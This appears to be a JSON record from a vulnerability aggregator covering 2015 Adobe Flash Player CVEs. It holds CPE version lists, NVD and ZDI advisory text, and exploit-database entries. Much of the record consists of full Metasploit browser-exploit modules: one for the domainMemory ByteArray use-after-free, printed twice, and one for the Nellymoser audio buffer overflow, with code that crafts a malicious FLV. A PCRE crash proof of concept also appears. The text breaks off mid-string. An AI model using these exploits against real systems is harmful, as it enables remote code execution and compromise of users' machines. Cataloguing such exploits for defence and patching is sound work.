"cpe:2.3:a:adobe:flash_player:14.0.0.125:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:15.0.0.167:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:16.0.0.287:*:*:*:*:*:*:*", "cpe:2.3:o:suse:suse_linux_workstation_extension:12.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:15.0.0.152:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server_supplementary_eus:6.6.z:*:*:*:*:*:*:*", "cpe:2.3:o:suse:suse_linux_enterprise_desktop:12.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:16.0.0.296:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:15.0.0.246:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:14.0.0.176:*:*:*:*:*:*:*", "cpe:2.3:o:opensuse:opensuse:13.2:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:17.0.0.134:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:16.0.0.235:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:14.0.0.179:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_desktop_supplementary:5.0:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server_supplementary:6.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:13.0.0.264:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:15.0.0.239:*:*:*:*:*:*:*", "cpe:2.3:o:suse:suse_linux_enterprise_desktop:11.0:sp3:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server_supplementary:5.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.2.202.451:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:14.0.0.145:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:15.0.0.223:*:*:*:*:*:*:*"]}, {"lastseen": "2020-12-09T20:03:00", "description": "Adobe Flash Player before 13.0.0.281 and 14.x through 17.x before 17.0.0.169 on Windows and OS X and before 11.2.202.457 on Linux allows attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2015-0350, CVE-2015-0352, CVE-2015-0353, CVE-2015-0354, CVE-2015-0355, CVE-2015-0360, CVE-2015-3038, CVE-2015-3041, CVE-2015-3042, and CVE-2015-3043.", "edition": 5, "cvss3": {}, "published": "2015-04-14T22:59:00", "title": "CVE-2015-0347", "type": "cve", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-0347"], "modified": "2018-10-30T16:27:00", "cpe": ["cpe:/a:adobe:flash_player:11.2.202.451", "cpe:/a:adobe:flash_player:13.0.0.264", "cpe:/a:adobe:flash_player:15.0.0.246", "cpe:/a:adobe:flash_player:16.0.0.287", "cpe:/o:opensuse:opensuse:13.1", "cpe:/a:adobe:flash_player:16.0.0.257", "cpe:/a:adobe:flash_player:16.0.0.296", "cpe:/a:adobe:flash_player:16.0.0.235", "cpe:/o:suse:suse_linux_enterprise_desktop:12.0", "cpe:/o:redhat:enterprise_linux_server_supplementary_eus:6.6.z", "cpe:/a:adobe:flash_player:14.0.0.145", "cpe:/a:adobe:flash_player:15.0.0.167", "cpe:/a:adobe:flash_player:14.0.0.176", "cpe:/o:suse:suse_linux_enterprise_desktop:11.0", "cpe:/o:opensuse:opensuse:13.2", "cpe:/o:redhat:enterprise_linux_workstation_supplementary:6.0", "cpe:/o:redhat:enterprise_linux_server_supplementary:5.0", "cpe:/a:adobe:flash_player:15.0.0.152", "cpe:/o:redhat:enterprise_linux_server_supplementary:6.0", "cpe:/o:redhat:enterprise_linux_desktop_supplementary:6.0", "cpe:/a:adobe:flash_player:15.0.0.223", "cpe:/a:adobe:flash_player:14.0.0.179", "cpe:/o:suse:suse_linux_workstation_extension:12.0", "cpe:/a:adobe:flash_player:17.0.0.134", "cpe:/o:redhat:enterprise_linux_desktop_supplementary:5.0", "cpe:/a:adobe:flash_player:15.0.0.239", "cpe:/a:adobe:flash_player:15.0.0.189", "cpe:/a:adobe:flash_player:14.0.0.125"], "id": "CVE-2015-0347", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-0347", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:adobe:flash_player:15.0.0.189:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_desktop_supplementary:6.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:16.0.0.257:*:*:*:*:*:*:*", "cpe:2.3:o:opensuse:opensuse:13.1:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_workstation_supplementary:6.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:14.0.0.125:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:15.0.0.167:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:16.0.0.287:*:*:*:*:*:*:*", "cpe:2.3:o:suse:suse_linux_workstation_extension:12.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:15.0.0.152:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server_supplementary_eus:6.6.z:*:*:*:*:*:*:*", "cpe:2.3:o:suse:suse_linux_enterprise_desktop:12.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:16.0.0.296:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:15.0.0.246:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:14.0.0.176:*:*:*:*:*:*:*", "cpe:2.3:o:opensuse:opensuse:13.2:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:17.0.0.134:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:16.0.0.235:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:14.0.0.179:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_desktop_supplementary:5.0:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server_supplementary:6.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:13.0.0.264:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:15.0.0.239:*:*:*:*:*:*:*", "cpe:2.3:o:suse:suse_linux_enterprise_desktop:11.0:sp3:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server_supplementary:5.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.2.202.451:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:14.0.0.145:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:15.0.0.223:*:*:*:*:*:*:*"]}], "zdi": [{"lastseen": "2020-06-22T11:42:03", "bulletinFamily": "info", "cvelist": ["CVE-2015-0347"], "edition": 3, "description": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Adobe Flash Player. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the handling of AVSource objects. By sending a specially crafted SWF an attacker can force a memory corruption condition. An attacker can leverage this vulnerability to execute code under the context of the current process.", "modified": "2015-06-22T00:00:00", "published": "2015-04-15T00:00:00", "href": "https://www.zerodayinitiative.com/advisories/ZDI-15-133/", "id": "ZDI-15-133", "title": "Adobe Flash Player AVSource Memory Corruption Remote Code Execution Vulnerability ", "type": "zdi", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-06-22T11:40:48", "bulletinFamily": "info", "cvelist": ["CVE-2015-3039"], "edition": 3, "description": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Adobe Flash Player. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the processing of AS2 ConvolutionFilter objects. By manipulating the matrix property of a ConvolutionFilter object, an attacker can force a dangling pointer to be reused after it has been freed. An attacker can leverage this vulnerability to execute code under the context of the current process.", "modified": "2015-06-22T00:00:00", "published": "2015-07-08T00:00:00", "href": "https://www.zerodayinitiative.com/advisories/ZDI-15-293/", "id": "ZDI-15-293", "title": "Adobe Flash Player AS2 ConvolutionFilter Use-After-Free Remote Code Execution Vulnerability", "type": "zdi", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-06-22T11:40:50", "bulletinFamily": "info", "cvelist": ["CVE-2015-0349"], "edition": 3, "description": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Adobe Flash Player. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the processing of AS3 ConvolutionFilter objects. By manipulating the matrix property of a ConvolutionFilter object, an attacker can force a dangling pointer to be reused after it has been freed. An attacker can leverage this vulnerability to execute code under the context of the current process.", "modified": "2015-06-22T00:00:00", "published": "2015-04-15T00:00:00", "href": "https://www.zerodayinitiative.com/advisories/ZDI-15-134/", "id": "ZDI-15-134", "title": " (Pwn2Own) Adobe Flash Player AS3 ConvolutionFilter Use-After-Free Remote Code Execution Vulnerability", "type": "zdi", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "zdt": [{"lastseen": "2018-01-02T19:07:40", "description": "Exploit for windows platform in category remote exploits", "edition": 2, "published": "2015-05-08T00:00:00", "type": "zdt", "title": "Adobe Flash Player domainMemory ByteArray Use After Free Exploit", "bulletinFamily": "exploit", "cvelist": ["CVE-2015-0359"], "modified": "2015-05-08T00:00:00", "id": "1337DAY-ID-23606", "href": "https://0day.today/exploit/description/23606", "sourceData": "##\r\n# This module requires Metasploit: http://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n \r\nrequire 'msf/core'\r\n \r\nclass Metasploit3 < Msf::Exploit::Remote\r\n Rank = NormalRanking\r\n \r\n include Msf::Exploit::Powershell\r\n include Msf::Exploit::Remote::BrowserExploitServer\r\n \r\n def initialize(info={})\r\n super(update_info(info,\r\n 'Name' => 'Adobe Flash Player domainMemory ByteArray Use After Free',\r\n 'Description' => %q{\r\n This module exploits a use-after-free vulnerability in Adobe Flash Player. The\r\n vulnerability occurs when the ByteArray assigned to the current ApplicationDomain\r\n is freed from an ActionScript worker, when forcing a reallocation by copying more\r\n contents than the original capacity, but Flash forgets to update the domainMemory\r\n pointer, leading to a use-after-free situation when the main worker references the\r\n domainMemory again. This module has been tested successfully on Windows 7 SP1\r\n (32-bit), IE 8 and IE11 with Flash 17.0.0.134.\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' =>\r\n [\r\n 'bilou', # Vulnerability discovery according to Flash Advisory\r\n 'Unknown', # Exploit in the wild\r\n 'hdarwin', # @hdarwin89 / public exploit (msf module is based on this one)\r\n 'juan vazquez' # msf module\r\n ],\r\n 'References' =>\r\n [\r\n ['CVE', '2015-0359'],\r\n ['URL', 'https://helpx.adobe.com/security/products/flash-player/apsb15-06.html'],\r\n ['URL', 'https://www.fireeye.com/blog/threat-research/2015/04/angler_ek_exploiting.html'],\r\n ['URL', 'http://malware.dontneedcoffee.com/2015/04/cve-2015-0359-flash-up-to-1700134-and.html'],\r\n ['URL', 'https://git.hacklab.kr/snippets/13'],\r\n ['URL', 'http://pastebin.com/Wj3NViUu']\r\n ],\r\n 'Payload' =>\r\n {\r\n 'DisableNops' => true\r\n },\r\n 'Platform' => 'win',\r\n 'BrowserRequirements' =>\r\n {\r\n :source => /script|headers/i,\r\n :os_name => OperatingSystems::Match::WINDOWS_7,\r\n :ua_name => Msf::HttpClients::IE,\r\n :flash => lambda { |ver| ver =~ /^17\\./ && Gem::Version.new(ver) <= Gem::Version.new('17.0.0.134') },\r\n :arch => ARCH_X86\r\n },\r\n 'Targets' =>\r\n [\r\n [ 'Automatic', {} ]\r\n ],\r\n 'Privileged' => false,\r\n 'DisclosureDate' => 'Apr 14 2014',\r\n 'DefaultTarget' => 0))\r\n end\r\n \r\n def exploit\r\n @swf = create_swf\r\n super\r\n end\r\n \r\n def on_request_exploit(cli, request, target_info)\r\n print_status(\"Request: #{request.uri}\")\r\n \r\n if request.uri =~ /\\.swf$/\r\n print_status('Sending SWF...')\r\n send_response(cli, @swf, {'Content-Type'=>'application/x-shockwave-flash', 'Cache-Control' => 'no-cache, no-store', 'Pragma' => 'no-cache'})\r\n return\r\n end\r\n \r\n print_status('Sending HTML...')\r\n send_exploit_html(cli, exploit_template(cli, target_info), {'Pragma' => 'no-cache'})\r\n end\r\n \r\n def exploit_template(cli, target_info)\r\n swf_random = \"#{rand_text_alpha(4 + rand(3))}.swf\"\r\n target_payload = get_payload(cli, target_info)\r\n psh_payload = cmd_psh_payload(target_payload, 'x86', {remove_comspec: true})\r\n b64_payload = Rex::Text.encode_base64(psh_payload)\r\n \r\n html_template = %Q|<html>\r\n <body>\r\n <object classid=\"clsid:d27cdb6e-ae6d-11cf-96b8-444553540000\" codebase=\"http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab\" width=\"1\" height=\"1\" />\r\n <param name=\"movie\" value=\"<%=swf_random%>\" />\r\n <param name=\"allowScriptAccess\" value=\"always\" />\r\n <param name=\"FlashVars\" value=\"sh=<%=b64_payload%>\" />\r\n <param name=\"Play\" value=\"true\" />\r\n <embed type=\"application/x-shockwave-flash\" width=\"1\" height=\"1\" src=\"<%=swf_random%>\" allowScriptAccess=\"always\" FlashVars=\"sh=<%=b64_payload%>\" Play=\"true\"/>\r\n </object>\r\n </body>\r\n </html>\r\n |\r\n \r\n return html_template, binding()\r\n end\r\n \r\n def create_swf\r\n path = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2015-0359', 'msf.swf')\r\n swf = ::File.open(path, 'rb') { |f| swf = f.read }\r\n \r\n swf\r\n end\r\n \r\nend\n\n# 0day.today [2018-01-02] #", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://0day.today/exploit/23606"}, {"lastseen": "2018-01-05T07:14:54", "edition": 2, "description": "Exploit for windows platform in category dos / poc", "published": "2015-08-19T00:00:00", "type": "zdt", "title": "Flash PCRE Regex Compilation Zero-Length Assertion Arbitrary Bytecode Execution Exploit", "bulletinFamily": "exploit", "cvelist": ["CVE-2015-3042"], "modified": "2015-08-19T00:00:00", "id": "1337DAY-ID-24086", "href": "https://0day.today/exploit/description/24086", "sourceData": "Source: https://code.google.com/p/google-security-research/issues/detail?id=224&can=1&q=label%3AProduct-Flash%20modified-after%3A2015%2F8%2F17&sort=id\r\n \r\nThere\u2019s an error in the PCRE engine version used in Flash that allows the execution of arbitrary PCRE bytecode, with potential for memory corruption and RCE.\r\n \r\nThis issue is a duplicate of http://bugs.exim.org/show_bug.cgi?id=1546 originally reported to PCRE upstream by mikispag; I rediscovered the issue fuzzing Flash so have filed this bug report to track disclosure deadline for Adobe.\r\n \r\nThe issue occurs in the handling of zero-length assertions; ie assertions where the object of the assertion is prepended with the OP_BRAZERO operator.\r\n \r\nSimplest testcase that will crash in an ASAN build is the following:\r\n \r\n(?(?<a>)?)\r\n \r\nThis is pretty much a nonsense expression, and I'm not sure why it compiles successfully; but it corresponds to the statement that 'assert that named group 'a' optionally matches'; which is tautologically true regardless of 'a'.\r\n \r\nRegardless, we emit the following bytecode:\r\n \r\n0000 5d0012 93 BRA [18]\r\n0003 5f000c 95 COND [12]\r\n0006 66 102 BRAZERO \r\n0007 5e00050001 94 CBRA [5, 1]\r\n000c 540005 84 KET [5]\r\n000f 54000c 84 KET [12]\r\n0012 540012 84 KET [18]\r\n0015 00 0 END \r\n \r\nWhen this is executed, we reach the following code:\r\n \r\n/* The condition is an assertion. Call match() to evaluate it - setting\r\nthe final argument match_condassert causes it to stop at the end of an\r\nassertion. */\r\n \r\nelse\r\n {\r\n RMATCH(eptr, ecode + 1 + LINK_SIZE, offset_top, md, ims, NULL,\r\n match_condassert, RM3);\r\n if (rrc == MATCH_MATCH)\r\n {\r\n condition = TRUE;\r\n ecode += 1 + LINK_SIZE + GET(ecode, LINK_SIZE + 2);\r\n while (*ecode == OP_ALT) ecode += GET(ecode, 1); <---- ecode is out of bounds at this point.\r\n \r\nIf we look at the execution trace for this expression, we can see where this code goes wrong:\r\n \r\nexec 0x600e0000dfe4 93 [0x60040000dfd0 41]\r\nexec 0x600e0000dfe7 95 [0x60040000dfd0 41]\r\nexec 0x600e0000dfea 102 [0x60040000dfd0 41] <--- RMATCH recursive match\r\nexec 0x600e0000dfeb 94 [0x60040000dfd0 41]\r\nexec 0x600e0000dff0 84 [0x60040000dfd0 41]\r\nexec 0x600e0000dff3 84 [0x60040000dfd0 41]\r\nexec 0x600e0000dff6 84 [0x60040000dfd0 41]\r\nexec 0x600e0000dff9 0 [0x60040000dfd0 41] <--- recursive match returns\r\nbefore 0x600e0000dfe7 24067 <--- ecode == 0x...dfe7\r\nafter 0x600e00013dea\r\n \r\nIf we look at the start base for our regex, it was based at dfe4; so dfe7 is the OP_COND, as expected. Looking at the next block of code, we're clearly expecting the assertion to be followed by a group; likely OP_CBRA or another opcode that has a 16-bit length field following the opcode byte.\r\n \r\necode += 1 + LINK_SIZE + GET(ecode, LINK_SIZE + 2);\r\n \r\nIn this case, the insertion of the OP_BRAZERO has resulted in the expected OP_CBRA being shifted forward by a byte to 0x...dfeb; and this GET results in the value of 0x5e00 + 1 + LINK_SIZE being added to the ecode pointer, instead of the correct 0x0005 + 1 + LINK_SIZE, resulting in bytecode execution hopping outside of the allocated heap buffer.\r\n \r\nSee attached for a crash PoC for the latest Chrome/Flash on x64 linux.\r\n \r\nhttps://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/37839.zip\n\n# 0day.today [2018-01-05] #", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://0day.today/exploit/24086"}, {"lastseen": "2018-01-06T03:00:59", "edition": 2, "description": "Exploit for multiple platform in category remote exploits", "published": "2015-07-09T00:00:00", "type": "zdt", "title": "Adobe Flash Player Nellymoser Audio Decoding Buffer Overflow Exploit", "bulletinFamily": "exploit", "cvelist": ["CVE-2015-3043"], "modified": "2015-07-09T00:00:00", "id": "1337DAY-ID-23847", "href": "https://0day.today/exploit/description/23847", "sourceData": "##\r\n# This module requires Metasploit: http://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n \r\nrequire 'msf/core'\r\n \r\nclass Metasploit3 < Msf::Exploit::Remote\r\n Rank = GreatRanking\r\n \r\n include Msf::Exploit::Remote::BrowserExploitServer\r\n \r\n def initialize(info={})\r\n super(update_info(info,\r\n 'Name' => 'Adobe Flash Player Nellymoser Audio Decoding Buffer Overflow',\r\n 'Description' => %q{\r\n This module exploits a buffer overflow on Adobe Flash Player when handling nellymoser\r\n encoded audio inside a FLV video, as exploited in the wild on June 2015. This module\r\n has been tested successfully on:\r\n \r\n Windows 7 SP1 (32-bit), IE11 and Adobe Flash 18.0.0.160,\r\n Windows 7 SP1 (32-bit), Firefox 38.0.5 and Adobe Flash 18.0.0.160,\r\n Windows 8.1, Firefox 38.0.5 and Adobe Flash 18.0.0.160,\r\n Linux Mint \"Rebecca\" (32 bits), Firefox 33.0 and Adobe Flash 11.2.202.466, and\r\n Ubuntu 14.04.2 LTS, Firefox 35.01, and Adobe Flash 11.2.202.466.\r\n \r\n Note that this exploit is effective against both CVE-2015-3113 and the\r\n earlier CVE-2015-3043, since CVE-2015-3113 is effectively a regression\r\n to the same root cause as CVE-2015-3043.\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' =>\r\n [\r\n 'Unknown', # Exploit in the wild\r\n 'juan vazquez' # msf module\r\n ],\r\n 'References' =>\r\n [\r\n ['CVE', '2015-3043'],\r\n ['CVE', '2015-3113'],\r\n ['URL', 'https://helpx.adobe.com/security/products/flash-player/apsb15-06.html'],\r\n ['URL', 'https://helpx.adobe.com/security/products/flash-player/apsb15-14.html'],\r\n ['URL', 'http://blog.trendmicro.com/trendlabs-security-intelligence/new-adobe-zero-day-shares-same-root-cause-as-older-flaws/'],\r\n ['URL', 'http://malware.dontneedcoffee.com/2015/06/cve-2015-3113-flash-up-to-1800160-and.html'],\r\n ['URL', 'http://bobao.360.cn/learning/detail/357.html']\r\n ],\r\n 'Payload' =>\r\n {\r\n 'DisableNops' => true\r\n },\r\n 'Platform' => ['win', 'linux'],\r\n 'Arch' => [ARCH_X86],\r\n 'BrowserRequirements' =>\r\n {\r\n :source => /script|headers/i,\r\n :arch => ARCH_X86,\r\n :os_name => lambda do |os|\r\n os =~ OperatingSystems::Match::LINUX ||\r\n os =~ OperatingSystems::Match::WINDOWS_7 ||\r\n os =~ OperatingSystems::Match::WINDOWS_81\r\n end,\r\n :ua_name => lambda do |ua|\r\n case target.name\r\n when 'Windows'\r\n return true if ua == Msf::HttpClients::IE || ua == Msf::HttpClients::FF\r\n when 'Linux'\r\n return true if ua == Msf::HttpClients::FF\r\n end\r\n \r\n false\r\n end,\r\n :flash => lambda do |ver|\r\n case target.name\r\n when 'Windows'\r\n return true if ver =~ /^18\\./ && Gem::Version.new(ver) <= Gem::Version.new('18.0.0.161')\r\n return true if ver =~ /^17\\./ && Gem::Version.new(ver) != Gem::Version.new('17.0.0.169')\r\n when 'Linux'\r\n return true if ver =~ /^11\\./ && Gem::Version.new(ver) <= Gem::Version.new('11.2.202.466') && Gem::Version.new(ver) != Gem::Version.new('11.2.202.457')\r\n end\r\n \r\n false\r\n end\r\n },\r\n 'Targets' =>\r\n [\r\n [ 'Windows',\r\n {\r\n 'Platform' => 'win'\r\n }\r\n ],\r\n [ 'Linux',\r\n {\r\n 'Platform' => 'linux'\r\n }\r\n ]\r\n ],\r\n 'Privileged' => false,\r\n 'DisclosureDate' => 'Jun 23 2015',\r\n 'DefaultTarget' => 0))\r\n end\r\n \r\n def exploit\r\n @swf = create_swf\r\n @flv = create_flv\r\n \r\n super\r\n end\r\n \r\n def on_request_exploit(cli, request, target_info)\r\n print_status(\"Request: #{request.uri}\")\r\n \r\n if request.uri =~ /\\.swf$/\r\n print_status('Sending SWF...')\r\n send_response(cli, @swf, {'Content-Type'=>'application/x-shockwave-flash', 'Cache-Control' => 'no-cache, no-store', 'Pragma' => 'no-cache'})\r\n return\r\n end\r\n \r\n if request.uri =~ /\\.flv$/\r\n print_status('Sending FLV...')\r\n send_response(cli, @flv, {'Content-Type'=>'video/x-flv', 'Cache-Control' => 'no-cache, no-store', 'Pragma' => 'no-cache'})\r\n return\r\n end\r\n \r\n print_status('Sending HTML...')\r\n send_exploit_html(cli, exploit_template(cli, target_info), {'Pragma' => 'no-cache'})\r\n end\r\n \r\n def exploit_template(cli, target_info)\r\n swf_random = \"#{rand_text_alpha(4 + rand(3))}.swf\"\r\n target_payload = get_payload(cli, target_info)\r\n b64_payload = Rex::Text.encode_base64(target_payload)\r\n os_name = target_info[:os_name]\r\n \r\n if target.name =~ /Windows/\r\n platform_id = 'win'\r\n elsif target.name =~ /Linux/\r\n platform_id = 'linux'\r\n end\r\n \r\n html_template = %Q|<html>\r\n <body>\r\n <object classid=\"clsid:d27cdb6e-ae6d-11cf-96b8-444553540000\" codebase=\"http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab\" width=\"1\" height=\"1\" />\r\n <param name=\"movie\" value=\"<%=swf_random%>\" />\r\n <param name=\"allowScriptAccess\" value=\"always\" />\r\n <param name=\"FlashVars\" value=\"sh=<%=b64_payload%>&pl=<%=platform_id%>&os=<%=os_name%>\" />\r\n <param name=\"Play\" value=\"true\" />\r\n <embed type=\"application/x-shockwave-flash\" width=\"1\" height=\"1\" src=\"<%=swf_random%>\" allowScriptAccess=\"always\" FlashVars=\"sh=<%=b64_payload%>&pl=<%=platform_id%>&os=<%=os_name%>\" Play=\"true\"/>\r\n </object>\r\n </body>\r\n </html>\r\n |\r\n \r\n return html_template, binding()\r\n end\r\n \r\n def create_swf\r\n path = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2015-3113', 'msf.swf')\r\n swf = ::File.open(path, 'rb') { |f| swf = f.read }\r\n \r\n swf\r\n end\r\n \r\n def create_flv\r\n header = ''\r\n header << 'FLV' # signature\r\n header << [1].pack('C') # version\r\n header << [4].pack('C') # Flags: TypeFlagsAudio\r\n header << [9].pack('N') # DataOffset\r\n \r\n data = ''\r\n data << \"\\x68\" # fmt = 6 (Nellymoser), SoundRate: 2, SoundSize: 0, SoundType: 0\r\n data << \"\\xee\" * 0x440 # SoundData\r\n \r\n tag1 = ''\r\n tag1 << [8].pack('C') # TagType (audio)\r\n tag1 << \"\\x00\\x04\\x41\" # DataSize\r\n tag1 << \"\\x00\\x00\\x1a\" # TimeStamp\r\n tag1 << [0].pack('C') # TimeStampExtended\r\n tag1 << \"\\x00\\x00\\x00\" # StreamID, always 0\r\n tag1 << data\r\n \r\n body = ''\r\n body << [0].pack('N') # PreviousTagSize\r\n body << tag1\r\n body << [0xeeeeeeee].pack('N') # PreviousTagSize\r\n \r\n flv = ''\r\n flv << header\r\n flv << body\r\n \r\n flv\r\n end\r\nend\n\n# 0day.today [2018-01-06] #", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://0day.today/exploit/23847"}], "exploitdb": [{"lastseen": "2016-02-04T04:44:38", "description": "Adobe Flash Player domainMemory ByteArray Use After Free. CVE-2015-0359. Remote exploit for windows platform", "published": "2015-05-08T00:00:00", "type": "exploitdb", "title": "Adobe Flash Player domainMemory ByteArray Use After Free", "bulletinFamily": "exploit", "cvelist": ["CVE-2015-0359"], "modified": "2015-05-08T00:00:00", "id": "EDB-ID:36956", "href": "https://www.exploit-db.com/exploits/36956/", "sourceData": "##\r\n# This module requires Metasploit: http://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n Rank = NormalRanking\r\n\r\n include Msf::Exploit::Powershell\r\n include Msf::Exploit::Remote::BrowserExploitServer\r\n\r\n def initialize(info={})\r\n super(update_info(info,\r\n 'Name' => 'Adobe Flash Player domainMemory ByteArray Use After Free',\r\n 'Description' => %q{\r\n This module exploits a use-after-free vulnerability in Adobe Flash Player. The\r\n vulnerability occurs when the ByteArray assigned to the current ApplicationDomain\r\n is freed from an ActionScript worker, when forcing a reallocation by copying more\r\n contents than the original capacity, but Flash forgets to update the domainMemory\r\n pointer, leading to a use-after-free situation when the main worker references the\r\n domainMemory again. This module has been tested successfully on Windows 7 SP1\r\n (32-bit), IE 8 and IE11 with Flash 17.0.0.134.\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' =>\r\n [\r\n 'bilou', # Vulnerability discovery according to Flash Advisory\r\n 'Unknown', # Exploit in the wild\r\n 'hdarwin', # @hdarwin89 / public exploit (msf module is based on this one)\r\n 'juan vazquez' # msf module\r\n ],\r\n 'References' =>\r\n [\r\n ['CVE', '2015-0359'],\r\n ['URL', 'https://helpx.adobe.com/security/products/flash-player/apsb15-06.html'],\r\n ['URL', 'https://www.fireeye.com/blog/threat-research/2015/04/angler_ek_exploiting.html'],\r\n ['URL', 'http://malware.dontneedcoffee.com/2015/04/cve-2015-0359-flash-up-to-1700134-and.html'],\r\n ['URL', 'https://git.hacklab.kr/snippets/13'],\r\n ['URL', 'http://pastebin.com/Wj3NViUu']\r\n ],\r\n 'Payload' =>\r\n {\r\n 'DisableNops' => true\r\n },\r\n 'Platform' => 'win',\r\n 'BrowserRequirements' =>\r\n {\r\n :source => /script|headers/i,\r\n :os_name => OperatingSystems::Match::WINDOWS_7,\r\n :ua_name => Msf::HttpClients::IE,\r\n :flash => lambda { |ver| ver =~ /^17\\./ && Gem::Version.new(ver) <= Gem::Version.new('17.0.0.134') },\r\n :arch => ARCH_X86\r\n },\r\n 'Targets' =>\r\n [\r\n [ 'Automatic', {} ]\r\n ],\r\n 'Privileged' => false,\r\n 'DisclosureDate' => 'Apr 14 2014',\r\n 'DefaultTarget' => 0))\r\n end\r\n\r\n def exploit\r\n @swf = create_swf\r\n super\r\n end\r\n\r\n def on_request_exploit(cli, request, target_info)\r\n print_status(\"Request: #{request.uri}\")\r\n\r\n if request.uri =~ /\\.swf$/\r\n print_status('Sending SWF...')\r\n send_response(cli, @swf, {'Content-Type'=>'application/x-shockwave-flash', 'Cache-Control' => 'no-cache, no-store', 'Pragma' => 'no-cache'})\r\n return\r\n end\r\n\r\n print_status('Sending HTML...')\r\n send_exploit_html(cli, exploit_template(cli, target_info), {'Pragma' => 'no-cache'})\r\n end\r\n\r\n def exploit_template(cli, target_info)\r\n swf_random = \"#{rand_text_alpha(4 + rand(3))}.swf\"\r\n target_payload = get_payload(cli, target_info)\r\n psh_payload = cmd_psh_payload(target_payload, 'x86', {remove_comspec: true})\r\n b64_payload = 